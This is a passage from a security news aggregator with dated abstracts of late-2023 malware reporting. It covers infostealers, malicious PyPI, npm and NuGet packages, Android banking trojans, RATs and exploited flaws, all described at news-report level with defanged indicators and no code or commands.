The stealer malware known as LummaC2 (aka Lumma Stealer) now features a new anti-sandbox technique that leverages the mathematical principle of trigonometry to evade detection and exfiltrate valuable information from infected hosts. The method is designed to "delay detonation of the sample until human mouse activity is detected," Outpost24 security researcher Alberto Marín said in a technical report shared with The Hacker News. Written in the C programming language, LummaC2 has been sold in underground forums since December 2022. The malware has since received iterative updates that make it harder to analyze via control flow flattening and even allow it to deliver additional payloads. The current version of LummaC2 (v4.0) also requires its customers to use a crypter as an added concealing mechanism, not to mention prevent it from being leaked in its raw form. Another noteworthy update is the reliance on trigonometry to detect human behavior on the infiltratedThe Hacker News
November 17, 2023
27 Malicious PyPI Packages with Thousands of Downloads Found Targeting IT Experts Full Text
Abstract
An unknown threat actor has been observed publishing typosquat packages to the Python Package Index (PyPI) repository for nearly six months with an aim to deliver malware capable of gaining persistence, stealing sensitive data, and accessing cryptocurrency wallets for financial gain. The 27 packages, which masqueraded as popular legitimate Python libraries, attracted thousands of downloads, Checkmarx said in a new report. A majority of the downloads originated from the U.S., China, France, Hong Kong, Germany, Russia, Ireland, Singapore, the U.K., and Japan. "A defining characteristic of this attack was the utilization of steganography to hide a malicious payload within an innocent-looking image file, which increased the stealthiness of the attack," the software supply chain security firm said . Some of the packages are pyefflorer, pyminor, pyowler, pystallerer, pystob, and pywool, the last of which was planted on May 13, 2023. A common denominator to these packages is tThe Hacker News
November 15, 2023
New PoC Exploit for Apache ActiveMQ Flaw Could Let Attackers Fly Under the Radar Full Text
Abstract
Cybersecurity researchers have demonstrated a new technique that exploits a critical security flaw in Apache ActiveMQ to achieve arbitrary code execution in memory. Tracked as CVE-2023-46604 (CVSS score: 10.0), the vulnerability is a remote code execution bug that could permit a threat actor to run arbitrary shell commands. It was patched by Apache in ActiveMQ versions 5.15.16, 5.16.7, 5.17.6, or 5.18.3 released late last month. The vulnerability has since come under active exploitation by ransomware outfits to deploy ransomware such as HelloKitty and a strain that shares similarities with TellYouThePass as well as a remote access trojan called SparkRAT. According to new findings from VulnCheck, threat actors weaponizing the flaw are relying on a public proof-of-concept ( PoC ) exploit originally disclosed on October 25, 2023. The attacks have been found to use ClassPathXmlApplicationContext , a class that's part of the Spring framework and available within ActiveThe Hacker News
November 13, 2023
CherryBlos Malware Steals Cryptocurrency via Your Photos Full Text
Abstract
CherryBlos is a family of Android malware that can steal cryptocurrency by extracting sensitive information from photos on a user's phone. This includes details related to cryptocurrency wallets, such as recovery phrases.Cyware
November 13, 2023
New BiBi-Windows Wiper Targets Windows Systems in Pro-Hamas Attacks Full Text
Abstract
Cybersecurity researchers have warned about a Windows version of a wiper malware that was previously observed targeting Linux systems in cyber attacks aimed at Israel. Dubbed BiBi-Windows Wiper by BlackBerry, the wiper is the Windows counterpart of BiBi-Linux Wiper , which has been put to use by a pro-Hamas hacktivist group in the wake of the Israel-Hamas war last month. "The Windows variant [...] confirms that the threat actors who created the wiper are continuing to build out the malware, and indicates an expansion of the attack to target end user machines and application servers," the Canadian company said Friday. Slovak cybersecurity firm is tracking the actor behind the wiper under the name BiBiGun, noting that the Windows variant (bibi.exe) is designed to overwrite data in the C:\Users directory recursively with junk data and appends .BiBi to the filename. The BiBi-Windows Wiper artifact is said to have been compiled on October 21, 2023, two weeks after theThe Hacker News
November 10, 2023
Stealthy Kamran Spyware Targeting Urdu-speaking Users in Gilgit-Baltistan Full Text
Abstract
Urdu-speaking readers of a regional news website that caters to the Gilgit-Baltistan region have likely emerged as a target of a watering hole attack designed to deliver a previously undocumented Android spyware dubbed Kamran . The campaign, ESET has discovered , leverages Hunza News (urdu.hunzanews[.]net), which, when opened on a mobile device, prompts visitors of the Urdu version to install its Android app directly hosted on the website. The app, however, incorporates malicious espionage capabilities, with the attack compromising at least 20 mobile devices to date. It has been available on the website since sometime between January 7, and March 21, 2023, around when massive protests were held in the region over land rights, taxation, and extensive power cuts. The malware, activated upon package installation, requests for intrusive permissions, allowing it to harvest sensitive information from the devices. This includes contacts, call logs, calendar events, location informaThe Hacker News
November 09, 2023
New Malvertising Campaign Uses Fake Windows News Portal to Distribute Malicious Installers Full Text
Abstract
A new malvertising campaign has been found to employ fake sites that masquerade as legitimate Windows news portal to propagate a malicious installer for a popular system profiling tool called CPU-Z. "This incident is a part of a larger malvertising campaign that targets other utilities like Notepad++, Citrix, and VNC Viewer as seen in its infrastructure (domain names) and cloaking templates used to avoid detection," Malwarebytes' Jérôme Segura said . While malvertising campaigns are known to set up replica sites advertising widely-used software, the latest activity marks a deviation in that the website mimics WindowsReport[.]com. The goal is to trick unsuspecting users searching for CPU-Z on search engines like Google by serving malicious ads that, when clicked, redirect them to the fake portal (workspace-app[.]online). At the same time, users who are not the intended victims of the campaign are served an innocuous blog with different articles, a technique known aThe Hacker News
November 9, 2023
New BlazeStealer Malware in PyPI Targets Developers Full Text
Abstract
A new set of malicious Python packages has been discovered on the Python Package Index (PyPI) repository. These packages masquerade as harmless obfuscation tools but contain a malware called BlazeStealer . The campaign started in January 2023 and includes eight packages. Developers must stay ale ... Read MoreCyware
November 09, 2023
MuddyC2Go: New C2 Framework Iranian Hackers Using Against Israel Full Text
Abstract
Iranian nation-state actors have been observed using a previously undocumented command-and-control (C2) framework called MuddyC2Go as part of attacks targeting Israel . "The framework's web component is written in the Go programming language," Deep Instinct security researcher Simon Kenin said in a technical report published Wednesday. The tool has been attributed to MuddyWater , an Iranian state-sponsored hacking crew that's affiliated to the country's Ministry of Intelligence and Security (MOIS). The cybersecurity firm said the C2 framework may have been put to use by the threat actor since early 2020, with recent attacks leveraging it in place of PhonyC2, another custom C2 platform from MuddyWater that came to light in June 2023 and has had its source code leaked. Typical attack sequences observed over the years have involved sending spear-phishing emails bearing malware-laced archives or bogus links that lead to the deployment of legitimateThe Hacker News
November 08, 2023
Beware, Developers: BlazeStealer Malware Discovered in Python Packages on PyPI Full Text
Abstract
A new set of malicious Python packages has slithered their way to the Python Package Index (PyPI) repository with the ultimate aim of stealing sensitive information from compromised developer systems. The packages masquerade as seemingly innocuous obfuscation tools, but harbor a piece of malware called BlazeStealer , Checkmarx said in a report shared with The Hacker News. "[BlazeStealer] retrieves an additional malicious script from an external source, enabling a Discord bot that gives attackers complete control over the victim's computer," security researcher Yehuda Gelb said. The campaign, which commenced in January 2023, entails a total of eight packages named Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood, the last of which was published in October. These modules come with setup.py and init.py files that are designed to retrieve a Python script hosted on transfer[.]sh, which gets executed immediately uponThe Hacker News
November 07, 2023
New GootLoader Malware Variant Evades Detection and Spreads Rapidly Full Text
Abstract
A new variant of the GootLoader malware called GootBot has been found to facilitate lateral movement on compromised systems and evade detection. "The GootLoader group's introduction of their own custom bot into the late stages of their attack chain is an attempt to avoid detections when using off-the-shelf tools for C2 such as CobaltStrike or RDP," IBM X-Force researchers Golo Mühr and Ole Villadsen said . "This new variant is a lightweight but effective malware allowing attackers to rapidly spread throughout the network and deploy further payloads." GootLoader, as the name implies, is a malware capable of downloading next-stage malware after luring potential victims using search engine optimization (SEO) poisoning tactics. It's linked to a threat actor tracked as Hive0127 (aka UNC2565). The use of GootBot points to a tactical shift, with the implant downloaded as a payload after a Gootloader infection in lieu of post-exploitation frameworks suchThe Hacker News
November 06, 2023
New Jupyter Infostealer Version Emerges with Sophisticated Stealth Tactics Full Text
Abstract
An updated version of an information stealer malware known as Jupyter has resurfaced with "simple yet impactful changes" that aim to stealthily establish a persistent foothold on compromised systems. "The team has discovered new waves of Jupyter Infostealer attacks which leverage PowerShell command modifications and signatures of private keys in attempts to pass off the malware as a legitimately signed file," VMware Carbon Black researchers said in a report shared with The Hacker News. Jupyter Infostealer, also known as Polazert, SolarMarker, and Yellow Cockatoo, has a track record of leveraging manipulated search engine optimization (SEO) tactics and malvertising as an initial access vector to trick users searching for popular software into downloading it from dubious websites. It comes with capabilities to harvest credentials as well as establish encrypted command-and-control (C2) communication to exfiltrate data and execute arbitrary commands. The lateThe Hacker News
November 06, 2023
SecuriDropper: New Android Dropper-as-a-Service Bypasses Google’s Defenses Full Text
Abstract
Cybersecurity researchers have shed light on a new dropper-as-a-service (DaaS) for Android called SecuriDropper that bypasses new security restrictions imposed by Google and delivers the malware. Dropper malware on Android is designed to function as a conduit to install a payload on a compromised device, making it a lucrative business model for threat actors, who can advertise the capabilities to other criminal groups. What's more, doing so also allows adversaries to separate the development and execution of an attack from the installation of the malware. "Droppers and the actors behind them are in a constant state of evolution as they strive to outwit evolving security measures," Dutch cybersecurity firm ThreatFabric said in a report shared with The Hacker News. One such security measure introduced by Google with Android 13 is what's called the Restricted Settings, which prevents sideloaded applications from obtaining Accessibility and Notification ListenerThe Hacker News
November 04, 2023
StripedFly Malware Operated Unnoticed for 5 Years, Infecting 1 Million Devices Full Text
Abstract
An advanced strain of malware masquerading as a cryptocurrency miner has managed to fly the radar for over five years, infecting no less than one million devices around the world in the process. That's according to findings from Kaspersky, which has codenamed the threat StripedFly , describing it as an "intricate modular framework that supports both Linux and Windows." The Russian cybersecurity vendor, which first detected the samples in 2017, said the miner is part of a much larger entity that employs a custom EternalBlue SMBv1 exploit attributed to the Equation Group in order to infiltrate publicly-accessible systems. The malicious shellcode, delivered via the exploit, has the ability to download binary files from a remote Bitbucket repository as well as execute PowerShell scripts. It also supports a collection of plugin-like expandable features to harvest sensitive data and even uninstall itself. The platform's shellcode is injected in the wininit.exe procThe Hacker News
November 03, 2023
NodeStealer Malware Hijacking Facebook Business Accounts for Malicious Ads Full Text
Abstract
Compromised Facebook business accounts are being used to run bogus ads that employ "revealing photos of young women" as lures to trick victims into downloading an updated version of a malware called NodeStealer . "Clicking on ads immediately downloads an archive containing a malicious .exe 'Photo Album' file which also drops a second executable written in .NET – this payload is in charge of stealing browser cookies and passwords," Bitdefender said in a report published this week. NodeStealer was first disclosed by Meta in May 2023 as a JavaScript malware designed to facilitate the takeover of Facebook accounts. Since then, the threat actors behind the operation have leveraged a Python-based variant in their attacks. The malware is part of a burgeoning cybercrime ecosystem in Vietnam, where multiple threat actors are leveraging overlapping methods that primarily involve advertising-as-a-vector on Facebook for propagation. The latest campaign discThe Hacker News
November 3, 2023
Unmasking New AsyncRAT Infection Chain Full Text
Abstract
AsyncRAT is being distributed through a malicious HTML file and uses various file types like PowerShell, WSF, and VBScript to bypass detection. The infection chain begins with a spam email containing a malicious URL to download the HTML file.Cyware
November 3, 2023
New DarkGate Variant Uses a New Loading Approach Full Text
Abstract
DarkGate is a versatile malware that includes features such as keylogging, information stealing, and downloading and executing other payloads. The DarkGate malware has been involved in multiple campaigns and continues to evolve.Cyware
November 03, 2023
48 Malicious npm Packages Found Deploying Reverse Shells on Developer Systems Full Text
Abstract
A new set of 48 malicious npm packages have been discovered in the npm repository with capabilities to deploy a reverse shell on compromised systems. "These packages, deceptively named to appear legitimate, contained obfuscated JavaScript designed to initiate a reverse shell on package install," software supply chain security firm Phylum said . All the counterfeit packages have been published by an npm user named hktalent ( GitHub , X ). As of writing, 39 of the packages uploaded by the author are still available for download. The attack chain is triggered post the installation of the package via an install hook in the package.json that calls a JavaScript code to establish a reverse shell to rsh.51pwn[.]com. "In this particular case, the attacker published dozens of benign-sounding packages with several layers of obfuscation and deceptive tactics in an attempt to ultimately deploy a reverse shell on any machine that simply installs one of these packages,"The Hacker News
November 1, 2023
Dozens of Kernel Drivers Allow Attackers to Alter Firmware, Escalate Privileges Full Text
Abstract
VMware Carbon Black's Threat Analysis Unit (TAU) has discovered numerous previously unknown vulnerable kernel drivers that could be exploited by hackers to modify firmware or gain elevated privileges.Cyware
November 01, 2023
Turla Updates Kazuar Backdoor with Advanced Anti-Analysis to Evade Detection Full Text
Abstract
The Russia-linked hacking crew known as Turla has been observed using an updated version of a known second-stage backdoor referred to as Kazuar. The new findings come from Palo Alto Networks Unit 42, which is tracking the adversary under its constellation-themed moniker Pensive Ursa . "As the code of the upgraded revision of Kazuar reveals, the authors put special emphasis on Kazuar's ability to operate in stealth, evade detection and thwart analysis efforts," security researchers Daniel Frank and Tom Fakterman said in a technical report. "They do so using a variety of advanced anti-analysis techniques and by protecting the malware code with effective encryption and obfuscation practices." Pensive Ursa, active since at least 2004, is attributed to the Russian Federal Security Service (FSB). Earlier this July, the Computer Emergency Response Team of Ukraine (CERT-UA) implicated the threat group to attacks targeting the defense sector in Ukraine and EastThe Hacker News
November 1, 2023
Malware ‘Meal Kits’ Serve Up No-Fuss RAT Attacks Full Text
Abstract
The Parallax RAT has seen a significant increase in usage, particularly through infected DLLs in seemingly legitimate invoices, making it harder for users to detect the attack.Cyware
October 31, 2023
Malicious NuGet Packages Exploit Loophole in MSBuild Integrations Full Text
Abstract
Cybersecurity firm ReversingLabs has discovered a coordinated and ongoing malicious campaign on the NuGet package manager. The campaign involves the publishing of hundreds of malicious packages since August.Cyware
October 31, 2023
Malicious NuGet Packages Caught Distributing SeroXen RAT Malware Full Text
Abstract
Cybersecurity researchers have uncovered a new set of malicious packages published to the NuGet package manager using a lesser-known method for malware deployment. Software supply chain security firm ReversingLabs described the campaign as coordinated and ongoing since August 1, 2023, while linking it to a host of rogue NuGet packages that were observed delivering a remote access trojan called SeroXen RAT . "The threat actors behind it are tenacious in their desire to plant malware into the NuGet repository, and to continuously publish new malicious packages," Karlo Zanki, reverse engineer at ReversingLabs, said in a report shared with The Hacker News. The names of some of the packages are below - Pathoschild.Stardew.Mod.Build.Config KucoinExchange.Net Kraken.Exchange DiscordsRpc SolanaWallet Monero Modern.Winform.UI MinecraftPocket.Server IAmRoot ZendeskApi.Client.V2 Betalgo.Open.AI Forge.Open.AI Pathoschild.Stardew.Mod.BuildConfig CData.NetSuite.Net.The Hacker News
October 31, 2023
Arid Viper Disguising Mobile Spyware as Updates for Non-Malicious Android Applications Full Text
Abstract
The malware used by Arid Viper shares similarities with a non-malicious dating app called Skipped, indicating a possible connection between the APT group and the app's developers.Cyware
October 26, 2023
iLeakage: New Safari Exploit Impacts Apple iPhones and Macs with A and M-Series CPUs Full Text
Abstract
A group of academics has devised a novel side-channel attack dubbed iLeakage that exploits a weakness in the A- and M-series CPUs running on Apple iOS, iPadOS, and macOS devices, enabling the extraction of sensitive information from the Safari web browser. "An attacker can induce Safari to render an arbitrary webpage, subsequently recovering sensitive information present within it using speculative execution," researchers Jason Kim, Stephan van Schaik, Daniel Genkin, and Yuval Yarom said in a new study. In a practical attack scenario, the weakness could be exploited using a malicious web page to recover Gmail inbox content and even recover passwords that are autofilled by credential managers. iLeakage, besides being the first case of a Spectre-style speculative execution attack against Apple Silicon CPUs, also works against all third-party web browsers available for iOS and iPadOS owing to Apple's App Store policy that mandates browser vendors to use Safari&The Hacker News
October 24, 2023
Backdoor Implant on Hacked Cisco Devices Modified to Evade Detection Full Text
Abstract
The backdoor implanted on Cisco devices by exploiting a pair of zero-day flaws in IOS XE software has been modified by the threat actor so as to escape visibility via previous fingerprinting methods. "Investigated network traffic to a compromised device has shown that the threat actor has upgraded the implant to do an extra header check," NCC Group's Fox-IT team said . "Thus, for a lot of devices, the implant is still active, but now only responds if the correct Authorization HTTP header is set." The attacks entail fashioning CVE-2023-20198 (CVSS score: 10.0) and CVE-2023-20273 (CVSS score: 7.2) into an exploit chain that grants the threat actor the ability to gain access to the devices, create a privileged account, and ultimately deploy a Lua-based implant on the devices. The development comes as Cisco began rolling out security updates to address the issues , with more updates to come at an as-yet-undisclosed date. The exact identity of the threatThe Hacker News
October 23, 2023
From Copacabana to Barcelona: The Cross-Continental Threat of Brazilian Banking Malware Full Text
Abstract
Proofpoint researchers have discovered a new version of the Grandoreiro malware that is targeting victims in both Mexico and Spain. This is unusual as the malware has historically only targeted Portuguese and Spanish speakers in Brazil and Mexico.Cyware
October 23, 2023
Quasar RAT Employs DLL Sideloading to Stay Under the Radar Full Text
Abstract
Quasar RAT, an open-source remote access trojan also known as CinaRAT or Yggdrasil, has been spotted leveraging a new Microsoft file as part of its DLL sideloading process to stealthily drop malicious payloads on compromised Windows systems. Once the Quasar RAT payload is executed in the computer' ... Read MoreCyware
October 23, 2023
Quasar RAT Leverages DLL Side-Loading to Fly Under the Radar Full Text
Abstract
The open-source remote access trojan known as Quasar RAT has been observed leveraging DLL side-loading to fly under the radar and stealthily siphon data from compromised Windows hosts. "This technique capitalizes on the inherent trust these files command within the Windows environment," Uptycs researchers Tejaswini Sandapolla and Karthickkumar Kathiresan said in a report published last week, detailing the malware's reliance on ctfmon.exe and calc.exe as part of the attack chain. Also known by the names CinaRAT or Yggdrasil, Quasar RAT is a C#-based remote administration tool capable of gathering system information, a list of running applications, files, keystrokes, screenshots, and executing arbitrary shell commands. DLL side-loading is a popular technique adopted by many threat actors to execute their own payloads by planting a spoofed DLL file with a name that a benign executable is known to be looking for. "Adversaries likely use side-loading as aThe Hacker News
October 20, 2023
ExelaStealer: A New Low-Cost Cybercrime Weapon Emerges Full Text
Abstract
A new information stealer named ExelaStealer has become the latest entrant to an already crowded landscape filled with various off-the-shelf malware designed to capture sensitive data from compromised Windows systems. "ExelaStealer is a largely open-source infostealer with paid customizations available from the threat actor," Fortinet FortiGuard Labs researcher James Slaughter said in a technical report. Written in Python and incorporating support for JavaScript, it comes fitted with capabilities to siphon passwords, Discord tokens, credit cards, cookies and session data, keystrokes, screenshots, and clipboard content. ExelaStealer is offered for sale via cybercrime forums as well as a dedicated Telegram channel set up by its operators who go by the online alias quicaxd. The paid-for version costs $20 a month, $45 for three months, or $120 for a lifetime license. The low cost of the commodity malware makes it a perfect hacking tool for newbies, effectively lowerinThe Hacker News
October 17, 2023
Researchers Warn of Increased Malware Delivery via Fake Browser Updates Full Text
Abstract
The threat group behind the SocGholish campaigns is likely responsible for the ClearFake malware delivery campaign, which uses compromised WordPress sites to push malicious fake browser updates.Cyware
October 16, 2023
SpyNote: Beware of This Android Trojan that Records Audio and Phone Calls Full Text
Abstract
The Android banking trojan known as SpyNote has been dissected to reveal its diverse information-gathering features. Typically spread via SMS phishing campaigns, attack chains involving the spyware trick potential victims into installing the app by clicking on the embedded link, according to F-Secure. Besides requesting invasive permissions to access call logs, camera, SMS messages, and external storage, SpyNote is known for hiding its presence from the Android home screen and the Recents screen in a bid to make it difficult to avoid detection. "The SpyNote malware app can be launched via an external trigger," F-Secure researcher Amit Tambe said in an analysis published last week. "Upon receiving the intent, the malware app launches the main activity." But most importantly, it seeks accessibility permissions, subsequently leveraging it to grant itself additional permissions to record audio and phone calls, log keystrokes, as well as capture screenshots oThe Hacker News
October 14, 2023
“EtherHiding” — Hiding Web2 Malicious Code in Web3 Smart Contracts Full Text
Abstract
A new malware campaign called "EtherHiding" has emerged, using BSC contracts to host parts of a malicious code chain. The campaign starts by hijacking WordPress sites and tricking users into downloading fake browser updates that are actually malware.Cyware
October 13, 2023
DarkGate Malware Spreading via Messaging Services Posing as PDF Files Full Text
Abstract
A piece of malware known as DarkGate has been observed being spread via instant messaging platforms such as Skype and Microsoft Teams. In these attacks, the messaging apps are used to deliver a Visual Basic for Applications ( VBA ) loader script that masquerades as a PDF document, which, when opened, triggers the download and execution of an AutoIt script designed to launch the malware. "It's unclear how the originating accounts of the instant messaging applications were compromised, however it is hypothesized to be either through leaked credentials available through underground forums or the previous compromise of the parent organization," Trend Micro said in a new analysis published Thursday. DarkGate, first documented by Fortinet in November 2018, is a commodity malware that incorporates a wide range of features to harvest sensitive data from web browsers, conduct cryptocurrency mining, and allow its operators to remotely control the infected hosts. It alsoThe Hacker News
October 12, 2023
Malicious NuGet Package Targeting .NET Developers with SeroXen RAT Full Text
Abstract
A malicious package hosted on the NuGet package manager for the .NET Framework has been found to deliver a remote access trojan called SeroXen RAT. The package, named Pathoschild.Stardew.Mod.Build.Config and published by a user named Disti , is a typosquat of a legitimate package called Pathoschild.Stardew.ModBuildConfig , software supply chain security firm Phylum said in a report today. While the real package has received nearly 79,000 downloads to date, the malicious variant is said to have artificially inflated its download count after being published on October 6, 2023, to surpass 100,000 downloads. The profile behind the package has published six other packages that have attracted no less than 2.1 million downloads cumulatively, four of which masquerade as libraries for various crypto services like Kraken, KuCoin, Solana, and Monero, but are also designed to deploy SeroXen RAT. The attack chain is initiated during installation of the package by means of a tools/init.ps1The Hacker News
October 12, 2023
Researchers Discover SeroXen RAT in Typosquatted NuGet Package Full Text
Abstract
The package contains a malicious install script that executes covertly during installation, downloading an obfuscated batch script that ultimately constructs and executes a PowerShell script.Cyware
October 12, 2023
Researchers Uncover Malware Posing as WordPress Caching Plugin Full Text
Abstract
Cybersecurity researchers have shed light on a new sophisticated strain of malware that masquerades a WordPress plugin to stealthily create administrator accounts and remotely control a compromised site. "Complete with a professional looking opening comment implying it is a caching plugin, this rogue code contains numerous functions, adds filters to prevent itself from being included in the list of activated plugins, and has pinging functionality that allows a malicious actor to check if the script is still operational, as well as file modification capabilities," Wordfence said . The plugin also offers the ability to activate and deactivate arbitrary plugins on the site remotely as well as create rogue admin accounts with the username superadmin and a hard-coded password. In what's seen as an attempt to erase traces of compromise, it features a function named "_pln_cmd_hide" that's designed to remove the superadmin account when it's no longer requirThe Hacker News
October 05, 2023
Analysis and Config Extraction of Lu0Bot, a Node.js Malware with Considerable Capabilities Full Text
Abstract
Nowadays, more malware developers are using unconventional programming languages to bypass advanced detection systems. The Node.js malware Lu0Bot is a testament to this trend. By targeting a platform-agnostic runtime environment common in modern web apps and employing multi-layer obfuscation, Lu0Bot is a serious threat to organizations and individuals. Although currently, the malware has low activity, the attackers are likely waiting for the right moment to strike. To be prepared for any future scenario, a team of analysts conducted an in-depth technical analysis of one of the recent samples of Lu0Bot and published an article documenting their process. Here's an overview of their research. Static analysis of the Lu0Bot sample The sample under investigation used an SFX packer, a self-extracting archive that can be opened with any archive utility. Its contents were explored individually. Archive contents 1. BAT-file The content of the BAT file The first line in theThe Hacker News
October 05, 2023
GoldDigger Android Trojan Targets Banking Apps in Asia Pacific Countries Full Text
Abstract
A new Android banking trojan named GoldDigger has been found targeting several financial applications with an aim to siphon victims' funds and backdoor infected devices. "The malware targets more than 50 Vietnamese banking, e-wallet and crypto wallet applications," Group-IB said . "There are indications that this threat might be poised to extend its reach across the wider APAC region and to Spanish-speaking countries." The malware was first detected by the Singapore-headquartered company in August 2023, although there is evidence to suggest that it has been active since June 2023. While the exact scale of the infections is currently not known, the malicious apps have been found to impersonate a Vietnamese government portal and an energy company to request intrusive permissions to meet its data-gathering goals. This primarily includes abusing Android's accessibility services , which is intended to assist users with disabilities to use the apps, inThe Hacker News
October 5, 2023
Attacker Deployed Hundreds of Rogue Python Packages with 75,000 Downloads to Steal Sensitive Data Full Text
Abstract
The malicious packages aim to steal sensitive data from systems, applications, browsers, and users. They also target cryptocurrency users by redirecting transactions to the attacker's account.Cyware
October 4, 2023
Mozilla Warns of Fake Thunderbird Downloads Delivering Ransomware Full Text
Abstract
The Snatch cybercrime group has been using paid Google ads to distribute their malware, posing as trusted software like Adobe Reader, Discord, Microsoft Teams, and Mozilla Thunderbird.Cyware
October 04, 2023
Researchers Link DragonEgg Android Spyware to LightSpy iOS Surveillanceware Full Text
Abstract
New findings have identified connections between an Android spyware called DragonEgg and another sophisticated modular iOS surveillanceware tool named LightSpy . DragonEgg , alongside WyrmSpy (aka AndroidControl), was first disclosed by Lookout in July 2023 as a strain of malware capable of gathering sensitive data from Android devices. It was attributed to the Chinese nation-state group APT41. On the other hand, details about LightSpy came to light in March 2020 as part of a campaign dubbed Operation Poisoned News in which Apple iPhone users in Hong Kong were targeted with watering hole attacks to install the spyware. Now, according to Dutch mobile security firm ThreatFabric, the attack chains involve the use of a trojanized Telegram app that's designed to download a second-stage payload (smallmload.jar), which, in turn, is configured to download a third component codenamed Core. Further analysis of the artifacts has revealed that the implant has been actively maintaineThe Hacker News
October 04, 2023
Rogue npm Package Deploys Open-Source Rootkit in New Supply Chain Attack Full Text
Abstract
A new deceptive package hidden within the npm package registry has been uncovered deploying an open-source rootkit called r77 , marking the first time a rogue package has delivered rootkit functionality. The package in question is node-hide-console-windows , which mimics the legitimate npm package node-hide-console-window in what's an instance of a typosquatting campaign. It was downloaded 704 times over the past two months before it was taken down. ReversingLabs, which first detected the activity in August 2023, said the package "downloaded a Discord bot that facilitated the planting of an open-source rootkit, r77," adding it "suggests that open-source projects may increasingly be seen as an avenue by which to distribute malware." The malicious code, per the software supply chain security firm, is contained within the package's index.js file that, upon execution, fetches an executable that's automatically run. The executable in question isThe Hacker News
October 03, 2023
Over 3 Dozen Data-Stealing Malicious npm Packages Found Targeting Developers Full Text
Abstract
Nearly three dozen counterfeit packages have been discovered in the npm package repository that are designed to exfiltrate sensitive data from developer systems, according to findings from Fortinet FortiGuard Labs. One set of packages – named @expue/webpack, @expue/core, @expue/vue3-renderer, @fixedwidthtable/fixedwidthtable, and @virtualsearchtable/virtualsearchtable – harbored an obfuscated JavaScript file that's capable of gathering valuable secrets. This includes Kubernetes configurations, SSH keys, and system metadata such as username, IP address, and hostname. The cybersecurity firm said it also discovered another collection of four modules, i.e., binarium-crm, career-service-client-0.1.6, hh-dep-monitoring, and orbitplate, which results in the unauthorized extraction of source code and configuration files. "The targeted files and directories may contain highly valuable intellectual property and sensitive information, such as various application and service credentThe Hacker News
October 02, 2023
BunnyLoader: New Malware-as-a-Service Threat Emerges in the Cybercrime Underground Full Text
Abstract
Cybersecurity experts have discovered yet another malware-as-a-service ( MaaS ) threat called BunnyLoader that's being advertised for sale on the cybercrime underground. "BunnyLoader provides various functionalities such as downloading and executing a second-stage payload, stealing browser credentials and system information, and much more," Zscaler ThreatLabz researchers Niraj Shivtarkar and Satyam Singh said in an analysis published last week. Among its other capabilities include running remote commands on the infected machine, a keylogger to capture keystrokes, and a clipper functionality to monitor the victim's clipboard and replace content matching cryptocurrency wallet addresses with actor-controlled addresses. A C/C++-based loader offered for $250 for a lifetime license, the malware is said to have been under continuous development since its debut on September 4, 2023, with new features and enhancements that incorporate anti-sandbox and antivirus evasionThe Hacker News
October 02, 2023
Zanubis Android Banking Trojan Poses as Peruvian Government App to Target Users Full Text
Abstract
An emerging Android banking trojan called Zanubis is now masquerading as a Peruvian government app to trick unsuspecting users into installing the malware. "Zanubis's main infection path is through impersonating legitimate Peruvian Android applications and then tricking the user into enabling the Accessibility permissions in order to take full control of the device," Kaspersky said in an analysis published last week. Zanubis, originally documented in August 2022, is the latest addition to a long list of Android banker malware targeting the Latin American (LATAM) region. Targets include more than 40 banks and financial entities in Peru. It's mainly known for abusing accessibility permissions on the infected device to display fake overlay screens atop the targeted apps in an attempt to steal credentials. it's also capable of harvesting contact data, list of installed apps, and system metadata. Kaspersky said it observed recent samples of Zanubis in the wThe Hacker News
September 29, 2023
Microsoft’s AI-Powered Bing Chat Ads May Lead Users to Malware-Distributing Sites Full Text
Abstract
Malicious ads served inside Microsoft Bing's artificial intelligence (AI) chatbot are being used to distribute malware when searching for popular tools. The findings come from Malwarebytes, which revealed that unsuspecting users can be tricked into visiting booby-trapped sites and installing malware directly from Bing Chat conversations. Introduced by Microsoft in February 2023, Bing Chat is an interactive search experience that's powered by OpenAI's large language model called GPT-4 . A month later, the tech giant began exploring placing ads in the conversations. But the move has also opened the doors for threat actors who resort to malvertising tactics and propagate malware. "Ads can be inserted into a Bing Chat conversation in various ways," Jérôme Segura, director of threat intelligence at Malwarebytes, said . "One of those is when a user hovers over a link and an ad is displayed first before the organic result." In an example highlighThe Hacker News
September 27, 2023
Newly Discovered ZenRAT Malware Targets Windows Users Full Text
Abstract
A new malware strain called ZenRAT has emerged in the wild to steal information from Windows systems. It was initially discovered on a website pretending to be associated with the open-source password manager Bitwarden. People should be wary of ads in search engine results as they remain a major dr ... Read MoreCyware
September 27, 2023
New ZenRAT Malware Targeting Windows Users via Fake Password Manager Software Full Text
Abstract
A new malware strain called ZenRAT has emerged in the wild that's distributed via bogus installation packages of the Bitwarden password manager. "The malware is specifically targeting Windows users and will redirect people using other hosts to a benign web page," enterprise security firm Proofpoint said in a technical report. "The malware is a modular remote access trojan (RAT) with information stealing capabilities." ZenRAT is hosted on fake websites pretending to be associated with Bitwarden, although it's uncertain as to how traffic is being directed to the domains. Such malware has been propagated via phishing, malvertising, or SEO poisoning attacks in the past. The payload (Bitwarden-Installer-version-2023-7-1.exe), downloaded from crazygameis[.]com, is a trojanized version of the standard Bitwarden installation package that contains a malicious .NET executable (ApplicationRuntimeMonitor.exe). A noteworthy aspect of the campaign is that users whThe Hacker News
September 26, 2023
Xenomorph Banking Trojan: A New Variant Targeting 35+ U.S. Financial Institutions Full Text
Abstract
An updated version of an Android banking trojan called Xenomorph has set its sights on more than 35 financial institutions in the U.S. The campaign, according to Dutch security firm ThreatFabric, leverages phishing web pages that are designed to entice victims into installing malicious Android apps that target a broader list of apps than its predecessors. Some of the other targeted prominent countries targeted comprise Spain, Canada, Italy, and Belgium. "This new list adds dozens of new overlays for institutions from the United States, Portugal, and multiple crypto wallets, following a trend that has been consistent amongst all banking malware families in the last year," the company said in an analysis published Monday. Xenomorph is a variant of another banker malware called Alien which first emerged in 2022. Later that year, the financial malware was propagated via a new dropper dubbed BugDrop , which bypassed security features in Android 13. A subsequent iterThe Hacker News
September 25, 2023
Xenomorph Malware Returns to Strike Customers of Over 30 American Banks Full Text
Abstract
The Xenomorph malware family, known for its advanced capabilities and distribution campaigns, has resurfaced with new overlays targeting institutions and crypto wallets in the United States and Portugal.Cyware
September 23, 2023
Deadglyph: New Advanced Backdoor with Distinctive Malware Tactics Full Text
Abstract
